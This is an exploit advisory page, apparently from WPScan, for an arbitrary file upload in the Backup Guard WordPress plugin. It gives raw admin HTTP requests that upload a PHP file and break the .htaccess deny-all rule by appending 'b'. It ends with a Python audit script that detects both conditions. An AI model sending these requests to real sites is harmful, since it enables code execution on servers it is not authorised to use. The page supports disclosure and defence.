## https://sploitus.com/exploit?id=WPEX-ID:D442ACAC-4394-45E4-B6BB-ADF4A40960FB
Video of the issue on an Nginx web server, as sent by the reporter: https://drive.google.com/file/d/1W9faaIZ6rPgrui8lzeY2s9cgKrGJhWTL/view?usp=sharing

Additional Info (WPScanTeam):

As an administrator, open the Backup page (/wp-admin/admin.php?page=backup_guard_backups) and import a PHP file, which will then be located at /wp-content/uploads/backup-guard/<filename.php>.

If the web server supports .htaccess, just import a .htaccess file with b as its content. It will be appended to the existing .htaccess, turning the deny from all line into deny from allb, which is invalid but raises no error.

Raw requests:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 229
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename="info.php"
Content-Type: text/php

<?=phpinfo();?>
-----------------------------130490272991349650929022108--


If .htaccess is supported by the web server, the following request removes the protection by appending a b to the existing deny from all line:

POST /wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=b4c6ea799c HTTP/1.1
Host: wp.lab
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://wp.lab/wp-admin/admin.php?page=backup_guard_backups
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------130490272991349650929022108
Content-Length: 216
Origin: https://wp.lab
Connection: close
Cookie: [Admin cookies]

-----------------------------130490272991349650929022108
Content-Disposition: form-data; name="files[]"; filename=".htaccess"
Content-Type: text/php

b
-----------------------------130490272991349650929022108--
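
A defender-side audit for the two conditions described above (an executable file in the backup-guard upload directory, and a deny rule corrupted by appended text), as an added example that is not part of the original advisory or the plugin's code. The extension list, the finding names and the sample file names are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a PHP-enabled server may execute (assumed list; match it to your handler config).
EXECUTABLE_EXT = {".php", ".phtml", ".phar", ".php5", ".php7", ".pht"}
# Exact forms of a working deny-all rule (Apache 2.2 and 2.4 syntax).
DENY_ALL = re.compile(r"^\s*(deny\s+from\s+all|require\s+all\s+denied)\s*$", re.I)
# A deny rule followed directly by extra characters, e.g. "deny from allb".
DENY_TAMPERED = re.compile(r"^\s*deny\s+from\s+all\S", re.I)


def audit_backup_dir(directory):
    """Return (kind, detail) findings for a backup-guard upload directory."""
    root = Path(directory)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in EXECUTABLE_EXT:
            findings.append(("executable-file", str(path.relative_to(root))))
    htaccess = root / ".htaccess"
    if not htaccess.is_file():
        findings.append(("htaccess-missing", ".htaccess"))
        return findings
    lines = [line for line in htaccess.read_text(errors="replace").splitlines()
             if line.strip() and not line.lstrip().startswith("#")]
    if not any(DENY_ALL.match(line) for line in lines):
        findings.append(("htaccess-no-deny", ".htaccess"))
    for line in lines:
        if DENY_TAMPERED.match(line):
            findings.append(("htaccess-tampered", line.strip()))
    return findings


def demo():
    """Audit a constructed directory that reproduces both conditions."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "info.php").write_text("<?=phpinfo();?>\n")  # constructed sample
        (root / "site-backup.dat").write_bytes(b"\x00")       # constructed, hypothetical name
        (root / ".htaccess").write_text("deny from allb")     # state after the append
        return audit_backup_dir(root)


if __name__ == "__main__":
    for kind, detail in demo():
        print(f"{kind}: {detail}")
```

Point `audit_backup_dir` at the site's wp-content/uploads/backup-guard directory; an empty result means no executable files were found and an intact deny rule is present.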